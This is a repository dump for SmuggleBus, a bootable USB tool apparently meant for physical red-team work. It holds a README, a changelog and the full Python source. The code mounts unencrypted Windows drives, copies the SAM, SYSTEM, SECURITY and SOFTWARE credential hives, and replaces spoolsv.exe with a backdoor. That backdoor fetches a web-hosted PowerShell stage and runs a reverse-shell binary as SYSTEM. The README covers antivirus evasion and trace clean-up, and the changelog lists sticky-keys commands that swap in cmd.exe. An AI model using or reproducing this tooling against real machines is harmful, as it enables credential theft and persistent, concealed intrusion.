README.md
# SmuggleBus
![logo](logo.png)

SmuggleBus is a USB bootable tool, built on barebones Linux, designed to aid penetration testers and red teamers performing physical social engineering exercises. 

Upon obtaining physical premises access to the target organization, the SmuggleBus can be used to aid in collection of local credentials and implanting backdoors. This is accomplished by taking advantage of unencrypted system hard drives. 

A typical attack flow would consist of the following:

	- Pentester obtains a physical access and identifies a desktop system not in use
            - unattended, conference room, or kiosk 
	- The pentester shutsdown the target system and boots into the SmuggleBus
	- In seconds, SmuggleBus will then:
		- Find and mount the unencrypted system hard drive
		- Copy local hives (SAM, SYSTEM, SECURITY, SOFTWARE) onto the SmuggleBus.
                - Uses a combination of symmetric and asymmetric cryptography to encrypt files prior writing to flashdrive storage (optional)
		- Implant a payload (Meterpreter, Empire, or Cobalt Strike), configured to run as SYSTEM. 
		- The SmuggleBus will then safely shutdown and return to the standard Windows OS boot. 
	- Upon boot the system executes the payload.  Any uploaded or modified files get cleaned up.



## Operating System
The SmuggleBus is built on Tiny Core Linux OS (http://distro.ibiblio.org/tinycorelinux), with only the essential packages loaded in. No networking is loaded to avoid tripping any Network Access Controls. 

Refer to wiki for detailed build instructions or download premade ISO from releases (link)

When imaged, the following will reside in the SmuggleBus home folder under /home/tc/:

| File | Description |
| --- | --- |
|startup.sh| Executed on boot. Launches smugglebus.py script, restarts the system upon completion.|
|smugglebus.py|	Python code that will identify, mount the Windows OS partition, export the hashes, and setup the backdoor. (Based on HashGrab v2.0 by s3my0n, under GNU General Public License)|
|public_key.pem| Public key used to encrypt the exported hives prior to writing to flash memory. Optional, encrypts if file exists. |
|payload| Placeholder location for the backdoor implant files (spoolsv.exe and start.exe)|
|reged|	Registry editor, export and import tool. (*Placeholder, not used in current version. Part of chntpw, the Offline Windows Password Editor, under GNU Lesser General Public License https://github.com/rescatux/chntpw)|
|.profile| Used to Launch startup.sh when TinyCore is fully loaded|


## Encryption
Using a combination of symmetric and asymmetric cryptography, files get encrypted prior being written to flashdrive storage. 

Setup:

    1. Generate RSA public/private key pair ./generate_keys.sh
    2. Copy the public key onto the SmuggleBus home directory /home/tc/public_key.pem
		
Execution Workflow:

	1. SmuggleBus generates a random 32 byte value (symmetric-key)
	2. The symmetric-key is used to AES 256 encrypt the collected registry hives
	3. Public key is used to encrypt the symmetric-key
	4. Once ran, new folder will be created in home directory, containing:
		- SAM.enc
		- SYSTEM.enc
		- SECURITY.enc
		- SOFTWARE.enc
		- KEY.enc

Decryption:

    1. Private key is used to decrypt the symmetric-key
    2. Decrypted symmetric-key is used to decrypt the registry hives ./decrypt.sh [arguments]
		
		Required arguments:
			-i DIRECTORY    Directory with SAM/SYSTEM/SECURITY & key.enc files    
			-o DIRECTORY    Output location                                       
			-p FILE         Private key location                                  
		Optional arguments:
			-x              Run secretsdump.py when done (Default: False) 
		
		
## Backdoor Implant
The design goal of the SmuggleBus payload injection was to have minimal impact on the targeted system. Any added or modified files get cleaned-up upon successful execution. 

Since pentesters often times will target machines onto which users rarely log into (conference room PCs, kiosks, etc.) the payload needs to execute prior to user logon with "NT AUTHORITY\SYSTEM" account. Due to security updates/enhancements of modern Windows Operating Systems, service implant technique is used for all flavors of Windows. 

### Service
The service backdoor implant works by swapping a Windows service binary with attacker's binary. Use generate_payload.sh to create spoolsv.exe implant and choose a URL where web-hosted-stage.txt will be hosted. When executed, the web hosted stage will create two scheduled tasks via PowerShell: a payload task, and a clean-up task. Save the newly created spoolsv.exe in the "/home/tc/payload" folder. 


By default, the payload task will attempt to execute "%appdata%\start.exe", which SmuggleBus uploads from "/home/tc/payload" folder to "C:\Windows\System32\config\systemprofile\AppData\Roaming\start.exe" (SYSTEM profile %appdata% folder). THIS IS YOUR REVERSE SHELL BINARY (Metasploit, Empire, Cobalt Strike, etc.) which could potentially get flagged by AV. Uploading a compiled binary and using a scheduled task to execute it directly from disk is the preferred method to go undetected.


The following is the execution flow:

	1. Backdoor is injected
		• Offline drive, "spoolsv.exe" is renamed to "spoolsv.exe.bak"
		• Hacked spoolsv.exe is uploaded
		• Reverse shell binary start.exe is uploaded
	2. System reboots, hacked spoolsv.exe executes
		• Configured to execute a web hosted PowerShell code that create two scheduled tasks
	3. New Scheduled Task is created (payload)
		• Executes start.exe as SYSTEM 
	4. 2nd task is created (clean-up)
		• Cleans up the scheduled tasks
		• Deletes hacked spoolsv.exe and restores original exe
		• Fixes temporarily modified service permissions
		• Service is started, resumes normal operation


# Build Instructions Quick Reference
Refer to wiki for detailed build instructions or download premade ISO from releases (link)

1. Download Core Plus from http://www.tinycorelinux.net/downloads.html
2. Install Tinycore to a USB flashdrive,
    - Use Ext2 as the partition
    - Select “Core Only” for the installation
3. Mount the flash drive into a linux distribution
4. Open boot/extlinux/extlinux.conf in an editior
5. Copy your UUID from the last line and append home=UUID=”YOUR UUID” and opt=UUID=”YOUR UUID”. This should all be on one line
    - Example: 
    APPEND initrd=/boot/core.gz quiet norestore waitusb=5:UUID="a13c5174-bde8-48f2-ac19-d9a6b73bb7c5" tce=UUID="a13c5174-bde8-48f2-ac19-d9a6b73bb7c5" home=UUID="a13c5174-bde8-48f2-ac19-d9a6b73bb7c5" opt=UUID="a13c5174-bde8-48f2-ac19-d9a6b73bb7c5"
6. Download Python, OpenSSL, and NTFS-3G tcz packages (python.tcz, openssl.tcz, ntfs-3g.tcz) from http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/
7. Place Python, OpenSSL, and NTFS-3G inside /tce/optional
8. Edit OnBoot.lst and add the entries, separated by a new line:
    - python.tcz 
    - openssl.tcz
    - ntfs-3g.tcz
9. Overwrite tc folder with the one in github (/home/tc)


changelog.txt

	11/16/2018
	----------
	- Version 1.1
		- Cleaned up smugglebus.py, defaulting to SERVICE IMPLANT payload for all OS versions
		- Pulling additional SOFTWARE hive (@dekanfrus and @exodust)
		- Updated decrypt.sh to include SOFTWARE 
		- Added generate_payload.sh and 4 templates
			[only template #3 will bypass Win Defender as of testing]
		- Updated web-hosted-stage.txt
		
		
	



	
	TODO
	----
	- Add function to search and copy sysprep config files - unattend.xml 
		these files could contain local admin creds
	- Add function to copy hiberfil.sys from Win OS root
		this file could be several gigs, copy will take a while..
		could allow us to pull domain creds from lsass
		http://blog.gentilkiwi.com/securite/mimikatz/windbg-extension
			^ UNABLE TO RECREATE (tested on Win7 box with no updates....)
				Win10 added additional huffman encoding to the hiberfil.sys
				hiber2dmp does not support			
	- Investigate Windows Credential Manager Vault and pulling/decoding from offline OS
		Would allow for access to application creds (IE, wifi?, etc.) 
	- Add sickey keys hack
		move c:\windows\system32\sethc.exe   c:\windows\system32\sethc.exe.bak
		copy c:\windows\system32\cmd.exe    c:\windows\system32\sethc.exe 
		reboot, hit shift x5 on login screen, get cmd running as SYSTEM without logging in :)

tc/smugglebus.py
#!/usr/bin/env python

# Script based on HashGrab v2.0 by s3my0n, 
#	Modified by Mike Wrzesniak and Piotr Marszalik for use with SmuggleBus

import sys, os, random, shutil, re, subprocess
import fnmatch
from time import sleep
from base64 import b64encode

Encrypt = os.path.isfile("/home/tc/public_key.pem") #if file exists, encrypt

class HashGrab(object):
    def __init__(self, basedir, filesystems=['HPFS/NTFS', 'FAT16/FAT32', 'ntfs']):
        self.basedir = basedir
        self.filesystems = filesystems
        self.dirstocheck = ['/WINDOWS/System32/config/', '/Windows/System32/config/', '/WINNT/System32/config/', '/WINDOWS/system32/config/']
        self.files = ['SYSTEM', 'SAM', 'system','sam','SECURITY','security','SOFTWARE','software']
        self.ftocopy = []
        self.hashes = {}
        self.devs = []
        self.mountdirs = []
        self.samsystem_dirs = {}
        self.filestocopy = []
        # poc
        # self.filestocopy = [['/mnt/GNsm5H', 'GNsm5H', '/mnt/GNsm5H/Windows/System32/config/SYSTEM', '/mnt/GNsm5H/Windows/System32/config/SAM']]

        
    def findPartitions(self):
        decider = subprocess.Popen(('whoami'), stdout=subprocess.PIPE).stdout
        decider = decider.read().strip()
        if decider != 'root':
            print '\n [-] Error: you are not root'
            sys.exit(1)
        else:
            ofdisk = subprocess.Popen(('blkid'), stdout=subprocess.PIPE).stdout
            rfdisk = [i.strip() for i in ofdisk]
            ofdisk.close()
            for line in rfdisk:
                for f in self.filesystems:
                    if f in line:
                        dev = re.findall('/\w+/\w+\d+', line)
                        self.devs.append(dev[0])

    def mountPartitions(self):
        def randgen(integer):
            chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
            x = random.sample(chars, integer)
            randstring = ''.join(x)
            return randstring
        print 'Mounting directories'						
        for dev in self.devs:
            mname = randgen(6)
            mdir = '/mnt/%s' % (mname)
            self.mountdirs.append([mdir, mname])
            os.mkdir(mdir)
            cmd = subprocess.call(('ntfs-3g', '-o remove_hiberfile', '%s'%(dev), '%s'%(mdir)))
            if cmd == 14:
                print '\n [-] Could not mount %s to %s: Trying ntfsfix and trying again' % (dev, mdir)
                cmd = subprocess.call(('ntfsfix','%s'%(dev)))
                cmd = subprocess.call(('ntfs-3g', '-o remove_hiberfile', '%s'%(dev), '%s'%(mdir)))
                if cmd == 14:
                    print '\n [-] Could not mount %s to %s: could not mount after ntfsfix. Trying other drives' % (dev, mdir)
            else:
                print '[*] Mounted %s to %s' % (dev, mdir)

    def findSamSystem(self):
        part_number = 0
        for m in self.mountdirs:
            self.filestocopy.append(m)
            for d in self.dirstocheck:
                for f in self.files:
                    cdir = '%s%s%s' % (m[0], d, f)
                    if os.path.isfile(cdir):
                        self.filestocopy[part_number].append(cdir)
            part_number+=1

    def copySamSystem(self):
        nmountdirs = len(self.mountdirs)
        decider = 0

        for f in self.filestocopy:
            # SAM and SYSTEM take up 3rd and 4th item in array
            if len(f) < 4:
                decider += 1
            else:
                self.ftocopy.append(f)
        if decider == nmountdirs:
            print '\n [-] Could not find SAM and SYSTEM files in %s' % (self.devs)
            self.cleanUp()
            sys.exit()
        else:
            print '[*] Copying SAM SYSTEM SECURITY and SOFTWARE files...'
            aes_key = b64encode(os.urandom(32)).decode('utf-8')
            for f in self.ftocopy:
                cpdir = '%s%s' % (self.basedir, f[1])
                self.samsystem_dirs[f[1]] = cpdir
                os.mkdir(cpdir)
                if Encrypt:
                    subprocess.call(['openssl', 'enc', '-aes-256-cbc', '-md', 'sha256', '-salt', '-in', f[2], '-out', os.path.join(cpdir,'SYSTEM.enc'), '-k', aes_key])
                    subprocess.call(['openssl', 'enc', '-aes-256-cbc', '-md', 'sha256', '-salt', '-in', f[3], '-out', os.path.join(cpdir,'SAM.enc'), '-k', aes_key])
                    subprocess.call(['openssl', 'enc', '-aes-256-cbc', '-md', 'sha256', '-salt', '-in', f[4], '-out', os.path.join(cpdir,'SECURITY.enc'), '-k', aes_key])
                    subprocess.call(['openssl', 'enc', '-aes-256-cbc', '-md', 'sha256', '-salt', '-in', f[5], '-out', os.path.join(cpdir,'SOFTWARE.enc'), '-k', aes_key])
                    echo_key = subprocess.Popen(('echo', aes_key), stdout=subprocess.PIPE)
                    output = subprocess.check_output(('openssl', 'rsautl', '-encrypt', '-inkey', 'public_key.pem', '-out', os.path.join(cpdir,'key.enc'), '-pubin'), stdin=echo_key.stdout)
                else:
                    shutil.copy(f[2], '%s/SYSTEM'%(cpdir))
                    shutil.copy(f[3], '%s/SAM'%(cpdir))
                    shutil.copy(f[4], '%s/SECURITY'%(cpdir))
                    shutil.copy(f[5], '%s/SOFTWARE'%(cpdir))

    def implantService(self):
        for f in self.filestocopy:
            #mountpointfoldername
            mt = f[1]
            spoolDir = '/mnt/%s/Windows/System32/' %(mt)    
            spoolBackdoor = '/home/tc/payload/spoolsv.exe'
            spoolOriginal = spoolDir + 'spoolsv.exe'
            spoolBackup = spoolDir + 'spoolsv.exe.bak'

            payload = '/home/tc/payload/start.exe'
            payloadDir = '/mnt/%s/Windows/System32/config/systemprofile/AppData/Roaming/' %(mt)
            payloadWin = payloadDir + 'start.exe' 

            osdirexist = os.path.isdir(payloadDir)
            if osdirexist:                        			
                print '[*] Implanting spoolsv.exe to %s' %(spoolOriginal)
                shutil.copy(spoolOriginal,spoolBackup)
                shutil.copy(spoolBackdoor,spoolOriginal)
                print '[*] Implanting start.exe to %s' %(payloadWin)
                shutil.copy(payload,payloadWin)
            else:            
                print '[ ] Payload directory does not exist on /mnt/%s'%(mt)

    def cleanUp(self, devs=True, mdirs=True, cpdirs=False):
        if devs:
            print '[*] Unmounting partitions...'
            sleep(1) # sometimes fails if you don't sleep
            for dev in self.devs:
                subprocess.call(('umount', '%s'%(dev)))
        if mdirs:
            print '[*] Deleting mount directories...'
            for d in self.mountdirs:
                os.rmdir(d[0])

if __name__=='__main__':

    basedir = './' #change hashes copy directory (include "/" at the end of path)

    decider = os.path.exists(basedir)
    if (decider == True) and (basedir[-1:] == '/'):
        hg = HashGrab(basedir)
        hg.findPartitions()
        hg.mountPartitions()
        hg.findSamSystem()
        hg.copySamSystem()
        hg.implantService()
        hg.cleanUp()
    else:
        print '\n [-] Error: check your basedir'
        sys.exit(1)

